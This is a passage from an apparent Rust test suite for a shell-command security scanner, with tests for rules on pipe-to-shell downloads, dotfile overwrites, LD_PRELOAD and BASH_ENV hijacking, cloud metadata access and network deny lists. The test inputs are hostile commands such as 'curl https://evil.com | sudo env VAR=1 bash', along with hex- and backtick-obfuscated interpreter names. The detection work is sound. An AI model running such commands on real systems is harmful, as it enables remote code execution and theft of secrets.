2126            "should detect pipe through env -u HOME bash"
2127        );
2128    }
2129
2130    #[test]
2131    fn test_dotfile_overwrite_detected() {
2132        let cases = [
2133            "echo malicious > ~/.bashrc",
2134            "echo malicious >> ~/.bashrc",
2135            "curl https://evil.com > ~/.bashrc",
2136            "cat payload > ~/.profile",
2137            "echo test > $HOME/.bashrc",
2138        ];
2139        for input in &cases {
2140            let findings = check_default(input, ShellType::Posix);
2141            eprintln!(
2142                "INPUT: {:?} -> findings: {:?}",
2143                input,
2144                findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
2145            );
2146            assert!(
2147                findings
2148                    .iter()
2149                    .any(|f| f.rule_id == RuleId::DotfileOverwrite),
2150                "should detect dotfile overwrite in: {input}",
2151            );
2152        }
2153    }
2154
2155    #[test]
2156    fn test_pipe_env_s_flag_detected() {
2157        let findings = check_default("curl https://evil.com | env -S bash -x", ShellType::Posix);
2158        assert!(
2159            findings
2160                .iter()
2161                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2162            "should detect pipe through env -S bash -x"
2163        );
2164    }
2165
2166    #[test]
2167    fn test_pipe_sudo_env_detected() {
2168        let findings = check_default(
2169            "curl https://evil.com | sudo env VAR=1 bash",
2170            ShellType::Posix,
2171        );
2172        assert!(
2173            findings
2174                .iter()
2175                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2176            "should detect pipe through sudo env VAR=1 bash"
2177        );
2178    }
2179
2180    #[test]
2181    fn test_httpie_pipe_bash() {
2182        let findings = check_default("http https://evil.com/install.sh | bash", ShellType::Posix);
2183        assert!(
2184            findings
2185                .iter()
2186                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2187            "should detect HTTPie pipe to bash"
2188        );
2189    }
2190
2191    #[test]
2192    fn test_httpie_https_pipe_bash() {
2193        let findings = check_default("https https://evil.com/install.sh | bash", ShellType::Posix);
2194        assert!(
2195            findings
2196                .iter()
2197                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2198            "should detect HTTPie https pipe to bash"
2199        );
2200    }
2201
2202    #[test]
2203    fn test_xh_pipe_bash() {
2204        let findings = check_default("xh https://evil.com/install.sh | bash", ShellType::Posix);
2205        assert!(
2206            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2207            "should detect xh pipe to bash"
2208        );
2209    }
2210
2211    #[test]
2212    fn test_xh_pipe_sudo_bash() {
2213        let findings = check_default(
2214            "xh https://evil.com/install.sh | sudo bash",
2215            ShellType::Posix,
2216        );
2217        assert!(
2218            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2219            "should detect xh pipe to sudo bash"
2220        );
2221    }
2222
2223    #[test]
2224    fn test_httpie_no_pipe_safe() {
2225        let findings = check_default("http https://example.com/api/data", ShellType::Posix);
2226        assert!(
2227            !findings
2228                .iter()
2229                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2230            "HTTPie without pipe should not trigger"
2231        );
2232    }
2233
2234    #[test]
2235    fn test_xh_no_pipe_safe() {
2236        let findings = check_default("xh https://example.com/api/data", ShellType::Posix);
2237        assert!(
2238            !findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2239            "xh without pipe should not trigger"
2240        );
2241    }
2242
2243    #[test]
2244    fn test_export_ld_preload() {
2245        let findings = check_default("export LD_PRELOAD=/evil/lib.so", ShellType::Posix);
2246        assert!(
2247            findings
2248                .iter()
2249                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
2250            "should detect LD_PRELOAD export"
2251        );
2252    }
2253
2254    #[test]
2255    fn test_export_bash_env() {
2256        let findings = check_default("export BASH_ENV=/tmp/evil.sh", ShellType::Posix);
2257        assert!(
2258            findings
2259                .iter()
2260                .any(|f| f.rule_id == RuleId::ShellInjectionEnv),
2261            "should detect BASH_ENV export"
2262        );
2263    }
2264
2265    #[test]
2266    fn test_export_pythonpath() {
2267        let findings = check_default("export PYTHONPATH=/evil/modules", ShellType::Posix);
2268        assert!(
2269            findings
2270                .iter()
2271                .any(|f| f.rule_id == RuleId::InterpreterHijackEnv),
2272            "should detect PYTHONPATH export"
2273        );
2274    }
2275
2276    #[test]
2277    fn test_export_openai_key() {
2278        let findings = check_default("export OPENAI_API_KEY=sk-abc123", ShellType::Posix);
2279        assert!(
2280            findings
2281                .iter()
2282                .any(|f| f.rule_id == RuleId::SensitiveEnvExport),
2283            "should detect OPENAI_API_KEY export"
2284        );
2285    }
2286
2287    #[test]
2288    fn test_export_path_safe() {
2289        let findings = check_default("export PATH=/usr/bin:$PATH", ShellType::Posix);
2290        assert!(
2291            !findings.iter().any(|f| matches!(
2292                f.rule_id,
2293                RuleId::CodeInjectionEnv
2294                    | RuleId::ShellInjectionEnv
2295                    | RuleId::InterpreterHijackEnv
2296                    | RuleId::SensitiveEnvExport
2297            )),
2298            "export PATH should not trigger env var detection"
2299        );
2300    }
2301
2302    #[test]
2303    fn test_env_ld_preload_cmd() {
2304        let findings = check_default(
2305            "env LD_PRELOAD=/evil/lib.so /usr/bin/target",
2306            ShellType::Posix,
2307        );
2308        assert!(
2309            findings
2310                .iter()
2311                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
2312            "should detect LD_PRELOAD via env command"
2313        );
2314    }
2315
2316    #[test]
2317    fn test_curl_metadata_endpoint() {
2318        let findings = check_default(
2319            "curl http://169.254.169.254/latest/meta-data",
2320            ShellType::Posix,
2321        );
2322        assert!(
2323            findings
2324                .iter()
2325                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2326            "should detect AWS metadata endpoint"
2327        );
2328    }
2329
2330    #[test]
2331    fn test_curl_private_network() {
2332        let findings = check_default("curl http://10.0.0.1/internal/api", ShellType::Posix);
2333        assert!(
2334            findings
2335                .iter()
2336                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
2337            "should detect private network access"
2338        );
2339    }
2340
2341    #[test]
2342    fn test_curl_public_ip_safe() {
2343        let findings = check_default("curl http://8.8.8.8/dns-query", ShellType::Posix);
2344        assert!(
2345            !findings.iter().any(|f| matches!(
2346                f.rule_id,
2347                RuleId::MetadataEndpoint | RuleId::PrivateNetworkAccess
2348            )),
2349            "public IP should not trigger network destination detection"
2350        );
2351    }
2352
2353    #[test]
2354    fn test_metadata_bare_ip() {
2355        let findings = check_default("curl 169.254.169.254/latest/meta-data", ShellType::Posix);
2356        assert!(
2357            findings
2358                .iter()
2359                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2360            "should detect bare IP metadata endpoint"
2361        );
2362    }
2363
2364    #[test]
2365    fn test_extract_host_from_url() {
2366        assert_eq!(
2367            extract_host_from_arg("http://169.254.169.254/latest"),
2368            Some("169.254.169.254".to_string())
2369        );
2370        assert_eq!(
2371            extract_host_from_arg("http://10.0.0.1:8080/api"),
2372            Some("10.0.0.1".to_string())
2373        );
2374        assert_eq!(
2375            extract_host_from_arg("169.254.169.254/path"),
2376            Some("169.254.169.254".to_string())
2377        );
2378        assert_eq!(
2379            extract_host_from_arg("8.8.8.8"),
2380            Some("8.8.8.8".to_string())
2381        );
2382        assert_eq!(extract_host_from_arg("-H"), None);
2383        assert_eq!(extract_host_from_arg("output.txt"), None);
2384    }
2385
2386    // --- Network policy tests ---
2387
2388    #[test]
2389    fn test_network_policy_deny_exact() {
2390        let deny = vec!["evil.com".to_string()];
2391        let allow = vec![];
2392        let findings = check_network_policy(
2393            "curl https://evil.com/data",
2394            ShellType::Posix,
2395            &deny,
2396            &allow,
2397        );
2398        assert_eq!(findings.len(), 1);
2399        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2400    }
2401
2402    #[test]
2403    fn test_network_policy_deny_subdomain() {
2404        let deny = vec!["evil.com".to_string()];
2405        let allow = vec![];
2406        let findings = check_network_policy(
2407            "wget https://sub.evil.com/data",
2408            ShellType::Posix,
2409            &deny,
2410            &allow,
2411        );
2412        assert_eq!(findings.len(), 1);
2413        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2414    }
2415
2416    #[test]
2417    fn test_network_policy_deny_cidr() {
2418        let deny = vec!["10.0.0.0/8".to_string()];
2419        let allow = vec![];
2420        let findings =
2421            check_network_policy("curl http://10.1.2.3/api", ShellType::Posix, &deny, &allow);
2422        assert_eq!(findings.len(), 1);
2423        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2424    }
2425
2426    #[test]
2427    fn test_network_policy_allow_exempts() {
2428        let deny = vec!["evil.com".to_string()];
2429        let allow = vec!["safe.evil.com".to_string()];
2430        let findings = check_network_policy(
2431            "curl https://safe.evil.com/data",
2432            ShellType::Posix,
2433            &deny,
2434            &allow,
2435        );
2436        assert_eq!(findings.len(), 0, "allow list should exempt from deny");
2437    }
2438
2439    #[test]
2440    fn test_network_policy_no_match() {
2441        let deny = vec!["evil.com".to_string()];
2442        let allow = vec![];
2443        let findings = check_network_policy(
2444            "curl https://example.com/data",
2445            ShellType::Posix,
2446            &deny,
2447            &allow,
2448        );
2449        assert_eq!(findings.len(), 0);
2450    }
2451
2452    #[test]
2453    fn test_network_policy_empty_deny() {
2454        let deny = vec![];
2455        let allow = vec![];
2456        let findings =
2457            check_network_policy("curl https://evil.com", ShellType::Posix, &deny, &allow);
2458        assert_eq!(
2459            findings.len(),
2460            0,
2461            "empty deny list should produce no findings"
2462        );
2463    }
2464
2465    #[test]
2466    fn test_cidr_contains() {
2467        assert_eq!(cidr_contains("10.0.0.1", "10.0.0.0/8"), Some(true));
2468        assert_eq!(cidr_contains("10.255.255.255", "10.0.0.0/8"), Some(true));
2469        assert_eq!(cidr_contains("11.0.0.1", "10.0.0.0/8"), Some(false));
2470        assert_eq!(cidr_contains("192.168.1.1", "192.168.0.0/16"), Some(true));
2471        assert_eq!(cidr_contains("192.169.1.1", "192.168.0.0/16"), Some(false));
2472        assert_eq!(cidr_contains("not-an-ip", "10.0.0.0/8"), None);
2473        assert_eq!(cidr_contains("10.0.0.1", "invalid"), None);
2474    }
2475
2476    #[test]
2477    fn test_matches_network_list_hostname() {
2478        let list = vec!["evil.com".to_string(), "bad.org".to_string()];
2479        assert!(matches_network_list("evil.com", &list));
2480        assert!(matches_network_list("sub.evil.com", &list));
2481        assert!(!matches_network_list("notevil.com", &list));
2482        assert!(!matches_network_list("good.com", &list));
2483    }
2484
2485    #[test]
2486    fn test_flag_value_url_detected_in_network_policy() {
2487        let deny = vec!["evil.com".to_string()];
2488        let allow = vec![];
2489        let findings = check_network_policy(
2490            "curl --url=http://evil.com/data",
2491            ShellType::Posix,
2492            &deny,
2493            &allow,
2494        );
2495        assert_eq!(findings.len(), 1, "should detect denied host in --flag=URL");
2496        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2497    }
2498
2499    #[test]
2500    fn test_flag_value_url_metadata_endpoint() {
2501        let findings = check(
2502            "curl --url=http://169.254.169.254/latest/meta-data",
2503            ShellType::Posix,
2504            None,
2505            ScanContext::Exec,
2506        );
2507        assert!(
2508            findings
2509                .iter()
2510                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2511            "should detect metadata endpoint in --flag=URL"
2512        );
2513    }
2514
2515    #[test]
2516    fn test_flag_value_url_private_network() {
2517        let findings = check(
2518            "curl --url=http://10.0.0.1/internal",
2519            ShellType::Posix,
2520            None,
2521            ScanContext::Exec,
2522        );
2523        assert!(
2524            findings
2525                .iter()
2526                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
2527            "should detect private network in --flag=URL"
2528        );
2529    }
2530
2531    #[test]
2532    fn test_strip_port_unbracketed_ipv6() {
2533        assert_eq!(strip_port("fe80::1"), "fe80::1");
2534    }
2535
2536    #[test]
2537    fn test_vet_not_configured_fires_without_supply_chain() {
2538        let dir = tempfile::tempdir().unwrap();
2539        let cwd = dir.path().to_str().unwrap();
2540        let findings = check(
2541            "cargo install serde_json",
2542            ShellType::Posix,
2543            Some(cwd),
2544            ScanContext::Exec,
2545        );
2546        assert!(findings
2547            .iter()
2548            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2549    }
2550
2551    #[test]
2552    fn test_vet_not_configured_suppressed_with_supply_chain() {
2553        let dir = tempfile::tempdir().unwrap();
2554        let sc_dir = dir.path().join("supply-chain");
2555        std::fs::create_dir_all(&sc_dir).unwrap();
2556        std::fs::write(sc_dir.join("config.toml"), "").unwrap();
2557        let cwd = dir.path().to_str().unwrap();
2558        let findings = check(
2559            "cargo install serde_json",
2560            ShellType::Posix,
2561            Some(cwd),
2562            ScanContext::Exec,
2563        );
2564        assert!(!findings
2565            .iter()
2566            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2567    }
2568
2569    #[test]
2570    fn test_vet_not_configured_skips_non_install() {
2571        let dir = tempfile::tempdir().unwrap();
2572        let cwd = dir.path().to_str().unwrap();
2573        let findings = check(
2574            "cargo build",
2575            ShellType::Posix,
2576            Some(cwd),
2577            ScanContext::Exec,
2578        );
2579        assert!(!findings
2580            .iter()
2581            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2582    }
2583
2584    #[test]
2585    fn test_vet_detects_cargo_with_flags() {
2586        let dir = tempfile::tempdir().unwrap();
2587        let cwd = dir.path().to_str().unwrap();
2588        let f1 = check(
2589            "cargo --locked install serde",
2590            ShellType::Posix,
2591            Some(cwd),
2592            ScanContext::Exec,
2593        );
2594        assert!(f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2595        let f2 = check(
2596            "cargo +nightly add tokio",
2597            ShellType::Posix,
2598            Some(cwd),
2599            ScanContext::Exec,
2600        );
2601        assert!(f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2602        let f3 = check(
2603            "cargo -Z sparse-registry install serde",
2604            ShellType::Posix,
2605            Some(cwd),
2606            ScanContext::Exec,
2607        );
2608        assert!(f3.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2609    }
2610
2611    #[test]
2612    fn test_vet_skipped_in_paste_context() {
2613        let dir = tempfile::tempdir().unwrap();
2614        let cwd = dir.path().to_str().unwrap();
2615        let findings = check(
2616            "cargo install serde_json",
2617            ShellType::Posix,
2618            Some(cwd),
2619            ScanContext::Paste,
2620        );
2621        assert!(!findings
2622            .iter()
2623            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2624    }
2625
2626    #[test]
2627    fn test_vet_no_false_positive_on_non_install_subcommand() {
2628        let dir = tempfile::tempdir().unwrap();
2629        let cwd = dir.path().to_str().unwrap();
2630        let f1 = check(
2631            "cargo test --package add",
2632            ShellType::Posix,
2633            Some(cwd),
2634            ScanContext::Exec,
2635        );
2636        assert!(!f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2637        let f2 = check(
2638            "cargo build install",
2639            ShellType::Posix,
2640            Some(cwd),
2641            ScanContext::Exec,
2642        );
2643        assert!(!f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2644    }
2645
2646    #[test]
2647    fn test_vet_detects_cargo_exe_windows_path() {
2648        let dir = tempfile::tempdir().unwrap();
2649        let cwd = dir.path().to_str().unwrap();
2650        let f1 = check(
2651            r"C:\Users\dev\.cargo\bin\cargo.exe install serde",
2652            ShellType::PowerShell,
2653            Some(cwd),
2654            ScanContext::Exec,
2655        );
2656        assert!(
2657            f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
2658            "should detect cargo.exe with Windows backslash path"
2659        );
2660        let f2 = check(
2661            r"C:\Users\dev\.cargo\bin\CARGO.EXE install serde",
2662            ShellType::PowerShell,
2663            Some(cwd),
2664            ScanContext::Exec,
2665        );
2666        assert!(
2667            f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
2668            "should detect CARGO.EXE case-insensitively"
2669        );
2670    }
2671
2672    // ── normalize_shell_token unit tests ──
2673
2674    #[test]
2675    fn test_normalize_ansi_c_basic() {
2676        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
2677    }
2678
2679    #[test]
2680    fn test_normalize_ansi_c_hex() {
2681        assert_eq!(
2682            normalize_shell_token("$'\\x62\\x61\\x73\\x68'", ShellType::Posix),
2683            "bash"
2684        );
2685    }
2686
2687    #[test]
2688    fn test_normalize_ansi_c_octal() {
2689        assert_eq!(
2690            normalize_shell_token("$'\\142\\141\\163\\150'", ShellType::Posix),
2691            "bash"
2692        );
2693    }
2694
2695    #[test]
2696    fn test_normalize_ansi_c_octal_leading_zero() {
2697        // \057 = '/' (octal 057 = 47 decimal = '/')
2698        assert_eq!(
2699            normalize_shell_token("$'\\057bin\\057bash'", ShellType::Posix),
2700            "/bin/bash"
2701        );
2702    }
2703
2704    #[test]
2705    fn test_normalize_ansi_c_bare_zero() {
2706        // \0 alone (no following octal digits) should still be NUL
2707        assert_eq!(normalize_shell_token("$'a\\0b'", ShellType::Posix), "a\0b");
2708    }
2709
2710    #[test]
2711    fn test_normalize_ansi_c_unicode() {
2712        assert_eq!(
2713            normalize_shell_token("$'\\u0062ash'", ShellType::Posix),
2714            "bash"
2715        );
2716    }
2717
2718    #[test]
2719    fn test_normalize_double_quotes() {
2720        assert_eq!(normalize_shell_token("\"bash\"", ShellType::Posix), "bash");
2721    }
2722
2723    #[test]
2724    fn test_normalize_cmd_caret_inside_double_quotes() {
2725        assert_eq!(normalize_shell_token("\"c^md\"", ShellType::Cmd), "cmd");
2726    }
2727
2728    #[test]
2729    fn test_normalize_single_quotes() {
2730        assert_eq!(normalize_shell_token("'bash'", ShellType::Posix), "bash");
2731    }
2732
2733    #[test]
2734    fn test_normalize_backslash() {
2735        assert_eq!(normalize_shell_token("ba\\sh", ShellType::Posix), "bash");
2736    }
2737
2738    #[test]
2739    fn test_normalize_empty_concat() {
2740        assert_eq!(normalize_shell_token("ba''sh", ShellType::Posix), "bash");
2741    }
2742
2743    #[test]
2744    fn test_normalize_mixed_concat() {
2745        assert_eq!(normalize_shell_token("'ba'sh", ShellType::Posix), "bash");
2746    }
2747
2748    #[test]
2749    fn test_normalize_powershell_backtick() {
2750        assert_eq!(
2751            normalize_shell_token("`i`e`x", ShellType::PowerShell),
2752            "iex"
2753        );
2754    }
2755
2756    #[test]
2757    fn test_normalize_unclosed_single_quote() {
2758        // Unclosed quote: everything after ' is literal, state ends in SINGLE_QUOTE
2759        let result = normalize_shell_token("'bash", ShellType::Posix);
2760        assert_eq!(result, "bash");
2761    }
2762
2763    #[test]
2764    fn test_normalize_unclosed_double_quote() {
2765        let result = normalize_shell_token("\"bash", ShellType::Posix);
2766        assert_eq!(result, "bash");
2767    }
2768
2769    // ── normalize_cmd_base unit tests ──
2770
2771    #[test]
2772    fn test_cmd_base_path() {
2773        assert_eq!(
2774            normalize_cmd_base("/usr/bin/bash", ShellType::Posix),
2775            "bash"
2776        );
2777    }
2778
2779    #[test]
2780    fn test_cmd_base_ansi_c() {
2781        assert_eq!(normalize_cmd_base("$'bash'", ShellType::Posix), "bash");
2782    }
2783
2784    #[test]
2785    fn test_cmd_base_exe() {
2786        assert_eq!(normalize_cmd_base("bash.exe", ShellType::Posix), "bash");
2787    }
2788
2789    #[test]
2790    fn test_cmd_base_uppercase() {
2791        assert_eq!(normalize_cmd_base("BASH", ShellType::Posix), "bash");
2792    }
2793
2794    #[test]
2795    fn test_cmd_base_powershell_path() {
2796        assert_eq!(
2797            normalize_cmd_base(r"C:\Git\bin\bash.exe", ShellType::PowerShell),
2798            "bash"
2799        );
2800    }
2801
2802    #[test]
2803    fn test_cmd_base_encoded_path() {
2804        // $'\x2fusr\x2fbin\x2fbash' → /usr/bin/bash → basename bash
2805        assert_eq!(
2806            normalize_cmd_base("$'\\x2fusr\\x2fbin\\x2fbash'", ShellType::Posix),
2807            "bash"
2808        );
2809    }
2810
2811    #[test]
2812    fn test_cmd_base_octal_encoded_path() {
2813        // $'\057bin\057bash' → /bin/bash → basename bash
2814        assert_eq!(
2815            normalize_cmd_base("$'\\057bin\\057bash'", ShellType::Posix),
2816            "bash"
2817        );
2818    }
2819
2820    #[test]
2821    fn test_cmd_base_env_s_value() {
2822        // "bash -x" → first word "bash"
2823        assert_eq!(normalize_cmd_base("\"bash -x\"", ShellType::Posix), "bash");
2824    }
2825
2826    #[test]
2827    fn test_cmd_base_path_with_args() {
2828        // "/usr/bin/bash -x" → basename "bash -x" → first word "bash"
2829        assert_eq!(
2830            normalize_cmd_base("\"/usr/bin/bash -x\"", ShellType::Posix),
2831            "bash"
2832        );
2833    }
2834
2835    // ── resolve_interpreter_name tests for new patterns ──
2836
2837    #[test]
2838    fn test_resolve_ansi_c_quoted_bash() {
2839        let findings = check_default(
2840            "curl https://example.com/install.sh | $'bash'",
2841            ShellType::Posix,
2842        );
2843        assert!(
2844            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2845            "should detect ANSI-C quoted bash: {:?}",
2846            findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
2847        );
2848    }
2849
2850    #[test]
2851    fn test_resolve_command_wrapper() {
2852        let findings = check_default(
2853            "curl https://example.com/install.sh | command bash",
2854            ShellType::Posix,
2855        );
2856        assert!(
2857            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2858            "should detect 'command bash'"
2859        );
2860    }
2861
2862    #[test]
2863    fn test_resolve_exec_a_wrapper() {
2864        let findings = check_default(
2865            "curl https://example.com/install.sh | exec -a myname bash",
2866            ShellType::Posix,
2867        );
2868        assert!(
2869            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2870            "should detect 'exec -a myname bash'"
2871        );
2872    }
2873
2874    #[test]
2875    fn test_resolve_nohup_wrapper() {
2876        let findings = check_default(
2877            "curl https://example.com/install.sh | nohup bash",
2878            ShellType::Posix,
2879        );
2880        assert!(
2881            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2882            "should detect 'nohup bash'"
2883        );
2884    }
2885
2886    #[test]
2887    fn test_resolve_wrapper_chain() {
2888        let findings = check_default(
2889            "curl https://example.com/install.sh | command sudo bash",
2890            ShellType::Posix,
2891        );
2892        assert!(
2893            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2894            "should detect wrapper chain 'command sudo bash'"
2895        );
2896    }
2897
2898    #[test]
2899    fn test_resolve_case_insensitive() {
2900        let findings = check_default(
2901            "curl https://example.com/install.sh | BASH",
2902            ShellType::Posix,
2903        );
2904        assert!(
2905            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2906            "should detect uppercase BASH"
2907        );
2908    }
2909
2910    #[test]
2911    fn test_resolve_powershell_backtick_iex() {
2912        let findings = check_default(
2913            "iwr https://evil.com/script.ps1 | `i`e`x",
2914            ShellType::PowerShell,
2915        );
2916        assert!(
2917            findings
2918                .iter()
2919                .any(|f| f.rule_id == RuleId::PipeToInterpreter),
2920            "should detect PowerShell backtick-escaped iex"
2921        );
2922    }
2923
2924    // --- Remediation hint tests ---
2925
2926    #[test]
2927    fn test_pipe_to_interpreter_hint_with_url() {
2928        let input = "curl https://example.com/install.sh | bash";
2929        let segments = tokenize::tokenize(input, ShellType::Posix);
2930        let mut findings = Vec::new();
2931        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2932        assert_eq!(findings.len(), 1);
2933        assert!(
2934            findings[0]
2935                .description
2936                .contains("https://example.com/install.sh"),
2937            "should include extracted URL in hint"
2938        );
2939        assert!(
2940            findings[0].description.contains("getvet.sh"),
2941            "should mention vet"
2942        );
2943        if cfg!(unix) {
2944            assert!(
2945                findings[0].description.contains("tirith run"),
2946                "Unix builds should suggest tirith run"
2947            );
2948        }
2949    }
2950
2951    #[test]
2952    fn test_pipe_to_interpreter_hint_quoted_url() {
2953        let input = r#"curl "https://example.com/install.sh" | bash"#;
2954        let segments = tokenize::tokenize(input, ShellType::Posix);
2955        let mut findings = Vec::new();
2956        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2957        assert_eq!(findings.len(), 1);
2958        assert!(
2959            findings[0]
2960                .description
2961                .contains("https://example.com/install.sh"),
2962            "should extract URL from quoted arg"
2963        );
2964    }
2965
2966    #[test]
2967    fn test_pipe_to_interpreter_hint_flag_equals_url() {
2968        let input = "curl --url=https://example.com/install.sh | bash";
2969        let segments = tokenize::tokenize(input, ShellType::Posix);
2970        let mut findings = Vec::new();
2971        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2972        assert_eq!(findings.len(), 1);
2973        assert!(
2974            findings[0]
2975                .description
2976                .contains("https://example.com/install.sh"),
2977            "should extract URL from --flag=value"
2978        );
2979    }
2980
2981    #[test]
2982    fn test_pipe_to_interpreter_evidence_includes_all_source_urls() {
2983        let input =
2984            "curl https://trusted.example.com/install.sh https://evil.example.com/payload.sh | bash";
2985        let segments = tokenize::tokenize(input, ShellType::Posix);
2986        let mut findings = Vec::new();
2987        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2988        assert_eq!(findings.len(), 1);
2989
2990        let urls: Vec<&str> = findings[0]
2991            .evidence
2992            .iter()
2993            .filter_map(|e| match e {
2994                Evidence::Url { raw } => Some(raw.as_str()),
2995                _ => None,
2996            })
2997            .collect();
2998
2999        assert_eq!(
3000            urls.len(),
3001            2,
3002            "all source URLs must be preserved in evidence"
3003        );
3004        assert!(urls.contains(&"https://trusted.example.com/install.sh"));
3005        assert!(urls.contains(&"https://evil.example.com/payload.sh"));
3006    }
3007
3008    #[test]
3009    fn test_pipe_to_interpreter_no_hint_for_cat() {
3010        let input = "cat /tmp/script.sh | bash";
3011        let segments = tokenize::tokenize(input, ShellType::Posix);
3012        let mut findings = Vec::new();
3013        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3014        assert_eq!(findings.len(), 1);
3015        assert!(
3016            !findings[0].description.contains("getvet.sh"),
3017            "non-fetch source should NOT get vet hint"
3018        );
3019        assert!(
3020            !findings[0].description.contains("tirith run"),
3021            "non-fetch source should NOT get tirith run hint"
3022        );
3023    }
3024
3025    #[test]
3026    fn test_dashdash_stops_flag_skipping() {
3027        // "command -- -x" should treat -x as the command, not a flag
3028        let input = "curl https://example.com/install.sh | command -- bash";
3029        let segments = tokenize::tokenize(input, ShellType::Posix);
3030        let mut findings = Vec::new();
3031        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3032        assert_eq!(findings.len(), 1, "should detect bash after --");
3033    }
3034
3035    #[test]
3036    fn test_sudo_dashdash_resolves_command() {
3037        // "sudo -- bash" should resolve to bash (-- ends sudo's options)
3038        let input = "curl https://example.com/install.sh | sudo -- bash";
3039        let segments = tokenize::tokenize(input, ShellType::Posix);
3040        let mut findings = Vec::new();
3041        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3042        assert_eq!(findings.len(), 1, "should detect bash after sudo --");
3043        assert!(
3044            findings[0].description.contains("interpreter 'bash'"),
3045            "should resolve to bash: {}",
3046            findings[0].description
3047        );
3048    }
3049
3050    #[test]
3051    fn test_ansic_quoting_not_applied_to_fish() {
3052        // Fish doesn't support $'...' — it should be treated as literal $
3053        assert_eq!(normalize_shell_token("$'bash'", ShellType::Fish), "$bash");
3054        // But POSIX should strip the $'...' wrapper
3055        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
3056    }
3057
3058    #[test]
3059    fn test_powershell_doubled_single_quote() {
3060        // PowerShell: '' inside single quotes is an escaped literal '
3061        assert_eq!(
3062            normalize_shell_token("'it''s'", ShellType::PowerShell),
3063            "it's"
3064        );
3065        // POSIX: '' ends and reopens — produces empty join
3066        assert_eq!(normalize_shell_token("'it''s'", ShellType::Posix), "its");
3067    }
3068
3069    #[test]
3070    fn test_sudo_combined_short_flags() {
3071        // sudo -iu root bash: -iu means -i -u, where -u takes "root" as value
3072        let input = "curl https://example.com/install.sh | sudo -iu root bash";
3073        let segments = tokenize::tokenize(input, ShellType::Posix);
3074        let mut findings = Vec::new();
3075        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3076        assert_eq!(
3077            findings.len(),
3078            1,
3079            "should detect pipe to bash through sudo -iu root"
3080        );
3081        assert!(
3082            findings[0].description.contains("interpreter 'bash'"),
3083            "should resolve to bash, not root: {}",
3084            findings[0].description
3085        );
3086    }
3087
3088    #[test]
3089    fn test_pipe_to_interpreter_hint_iwr_powershell() {
3090        let input = "iwr https://evil.com/script.ps1 | iex";
3091        let segments = tokenize::tokenize(input, ShellType::PowerShell);
3092        let mut findings = Vec::new();
3093        check_pipe_to_interpreter(&segments, ShellType::PowerShell, &mut findings);
3094        assert_eq!(findings.len(), 1);
3095        assert!(
3096            findings[0].description.contains("getvet.sh"),
3097            "iwr (PowerShell fetch) should get vet hint"
3098        );
3099        assert!(
3100            !findings[0].description.contains("tirith run"),
3101            "PowerShell fetch should NOT suggest tirith run"
3102        );
3103    }
3104
3105    #[test]
3106    fn test_pipe_to_interpreter_hint_sanitizes_ansi_in_url() {
3107        // \x1b[31m is an ANSI "red" escape — must be stripped from hint
3108        let input = "curl https://example.com/\x1b[31mred | bash";
3109        let segments = tokenize::tokenize(input, ShellType::Posix);
3110        let mut findings = Vec::new();
3111        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3112        assert_eq!(findings.len(), 1);
3113        assert!(
3114            !findings[0].description.contains('\x1b'),
3115            "ANSI escape must be stripped from hint URL: {}",
3116            findings[0].description
3117        );
3118        assert!(
3119            findings[0]
3120                .description
3121                .contains("https://example.com/[31mred"),
3122            "URL should be present minus the ESC byte: {}",
3123            findings[0].description
3124        );
3125    }
3126
3127    #[test]
3128    fn test_pipe_to_interpreter_hint_sanitizes_newline_in_url() {
3129        // Newline in URL arg could spoof extra output lines
3130        let input = "curl \"https://example.com/\nFAKE: safe\" | bash";
3131        let segments = tokenize::tokenize(input, ShellType::Posix);
3132        let mut findings = Vec::new();
